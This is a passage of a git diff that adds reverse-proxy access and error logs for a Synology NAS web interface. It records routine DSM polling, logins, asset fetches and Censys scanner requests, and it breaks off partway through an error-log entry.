192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:56:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:56:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:56:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:56:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:56:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:02 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:07 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:15 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:57:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:07 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:07 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:35 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:58:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:02 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:15 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:27 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:59:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:00:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:00:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/auth.cgi?api=SYNO.API.Auth&version=6&method=token" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:00:10 +0000] - 101 101 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=rxy.D95tk.Pk.&UserType=user&EIO=3&transport=websocket&sid=iBANAb7tRX6bbyFxAAAJ" [Client 84.1.26.27] [Length 12900] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[30/Jan/2026:14:00:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:00:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.UserSettings&method=apply&version=1&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:00:10 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:00:11 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:00:12 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:14:08:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth" [Client 84.1.26.27] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[31/Jan/2026:08:46:12 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 204.76.203.25] [Length 12679] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:10:06:22 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.43.179] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:06:23 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 37.76.43.179] [Length 641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[31/Jan/2026:10:06:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769853984812" [Client 37.76.43.179] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[31/Jan/2026:10:06:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769853985635" [Client 37.76.43.179] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[31/Jan/2026:10:11:07 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.43.179] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:11:07 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 37.76.43.179] [Length 641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[31/Jan/2026:10:11:08 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769854267855" [Client 37.76.43.179] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[31/Jan/2026:10:11:08 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769854268055" [Client 37.76.43.179] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/vendor.js" [Client 204.76.203.25] [Length 68654] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/dsm.desktop.bundle.js" [Client 204.76.203.25] [Length 100511] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js" [Client 204.76.203.25] [Length 2013] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.sds.bundle.js" [Client 204.76.203.25] [Length 51641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.common.bundle.js" [Client 204.76.203.25] [Length 61046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js" [Client 204.76.203.25] [Length 23582] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/entry/dist/dsm.entry.bundle.js" [Client 204.76.203.25] [Length 1658] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.js" [Client 204.76.203.25] [Length 28266] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/dsm.taskbar.bundle.js" [Client 204.76.203.25] [Length 152247] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[01/Feb/2026:06:16:39 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 66.132.153.125] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:06:16:40 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_96.png?v=40438" [Client 66.132.153.125] [Length 2271] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:06:16:41 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico?v=40438" [Client 66.132.153.125] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:06:16:42 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_64.png?v=40438" [Client 66.132.153.125] [Length 1312] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:06:16:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_48.png?v=40438" [Client 66.132.153.125] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:06:16:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 66.132.153.125] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:06:53:55 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 167.94.138.197] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:17:33:59 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 192.227.159.123] [Length 2850] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" "-" diff --git a/proxy-manager/data/logs/proxy-host-6_access.log.1.gz b/proxy-manager/data/logs/proxy-host-6_access.log.1.gz new file mode 100755 index 0000000..065a7ba Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-6_access.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-6_access.log.2.gz b/proxy-manager/data/logs/proxy-host-6_access.log.2.gz new file mode 100755 index 0000000..50783ba Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-6_access.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-6_access.log.3.gz b/proxy-manager/data/logs/proxy-host-6_access.log.3.gz new file mode 100755 index 0000000..6e5c362 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-6_access.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-6_error.log b/proxy-manager/data/logs/proxy-host-6_error.log new file mode 100755 index 0000000..0fe8f28 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-6_error.log @@ -0,0 +1,48 @@ +2026/01/13 11:08:13 [warn] 254#254: *17647 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/46/0000007460 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/ext-3/ux/ux-all.js?v=1650348555 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/ext-3/ux/ux-all.js?v=1650348555", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 04:22:21 [warn] 298#298: *46150 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/84/0000020845 while reading upstream, client: 84.254.106.197, server: nas.profibot.hu, request: "GET 